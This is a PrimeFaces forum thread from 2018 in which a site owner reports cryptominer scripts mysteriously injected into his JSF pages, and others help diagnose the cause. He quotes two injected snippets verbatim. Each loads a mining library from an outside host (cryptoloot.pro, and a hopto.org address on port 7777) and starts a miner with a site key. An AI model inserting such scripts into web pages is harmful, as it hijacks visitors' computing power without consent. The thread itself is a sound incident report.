URGENT: Mining script in PrimeFaces page? Where does it come from??

UI Components for JSF
danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 15:18

Hi all,

We've been using PrimeFaces for years now and it's really a great and easy framework. Good job!

A few days ago we detected a mining script in our PrimeFaces page.
It's embedded before the </html> tag and after the </form> tag.

Code:

<script src="//cryptoloot.pro/lib/crlt.js"></script>
<script>var miner = new CRLT.Anonymous("6059931f4f5d4016d81f2242004b614b370411684aaa");miner.start();</script> 
We have not been hijacked or anything. We could also exclude DNS or proxies; it appears locally in our Apache DumpIO log.
The script doesn't appear immediately... it takes some time.

It uses 100% CPU.....


Any ideas? Thanks for your help


Greetings

Daniel

tandraschko
PrimeFaces Core Developer
Posts: 3979
Joined: 03 Dec 2010, 14:11
Location: Bavaria, DE
Contact:

08 Jan 2018, 15:25

Try to search for something similar in your application(s) and database.
Thomas Andraschko

PrimeFaces | PrimeFaces Extensions

Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE

Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 16:08

Thanks tandraschko,

We did this before we posted this issue (also the Apache DumpIO log).
We didn't find any snippets comparable to this, and it really seems to be embedded during page creation.

Any further ideas how to detect WHO embeds this snippet?

Greetings

Daniel

kukeltje
Expert Member
Posts: 9605
Joined: 17 Jun 2010, 13:34
Location: Netherlands

08 Jan 2018, 16:28

Are you sure it is in the response from the server to the client? Sure the client is not hijacked or using some obscure plugin? Or do you use a banner site that is hijacked?

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 19:08

We've enabled Apache's DumpIO log on our server to exclude external infrastructure, and we can see the script there (right after </form> and before </html>).
So browser plugins are ruled out here. :-)

Greetings

Daniel

tandraschko
PrimeFaces Core Developer
Posts: 3979
Joined: 03 Dec 2010, 14:11
Location: Bavaria, DE
Contact:

08 Jan 2018, 21:32

I googled it and it could be a trojan on the client ;) I don't think it's related to PF.
Last edited by tandraschko on 22 Jan 2018, 12:19, edited 1 time in total.

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 23:41

The server is a dedicated Linux machine without any GUI, running WildFly 10 behind Apache.
I see the script in the Apache log on this server (just after it is rendered and BEFORE it's transported to any client).

OK, so far so good. I think I must investigate further with a focus on WildFly / Apache.


Thanks for your views

kukeltje
Expert Member
Posts: 9605
Joined: 17 Jun 2010, 13:34
Location: Netherlands

09 Jan 2018, 01:16

I searched for "6059931f4f5d4016d81f2242004b614b370411684aaa" on Google and both hits I got were on a Vietnamese and a Brazilian site, both using PrimeFaces... But both do not have it in their pages (anymore)...

Did you build PF from source by accident? Maybe the compress js sources plugin was hacked or something?

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

09 Jan 2018, 03:16

I searched for it too last night and I found these pages too, but it doesn't really help.

I mailed cryptoloot.pro for further information about this key, but they haven't answered yet.

The script itself disappeared last night after a server restart (complete machine restart running WildFly).
Unfortunately it came back in the morning. It seems to be dynamic, but I can't identify its origin.


Thanks for your help

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

13 Jan 2018, 15:06

For those who are still interested... the Cryptoloot script disappeared a few days ago, but now I've got a new one:

Code:

<script src="https://jhondi33.hopto.org:7777/deepMiner.js"></script>
<script>var miner = new deepMiner.Anonymous("605deepaaa");miner.start();</script>
I'm really confused... one of my server components seems to be vulnerable: WildFly 10.1 (uses Undertow), Apache 2.4.23, or even Mojarra 2.1.21 or PrimeFaces 5.3.

EDIT:
You can now find a lot of pages by searching for "https://jhondi33.hopto.org:7777/deepMiner.js"... they're all related to PrimeFaces... I think it's really a PrimeFaces issue.
And once again: we're not talking about client malware. I see this script in Apache's DumpIO log... BEFORE it's transferred to the client.
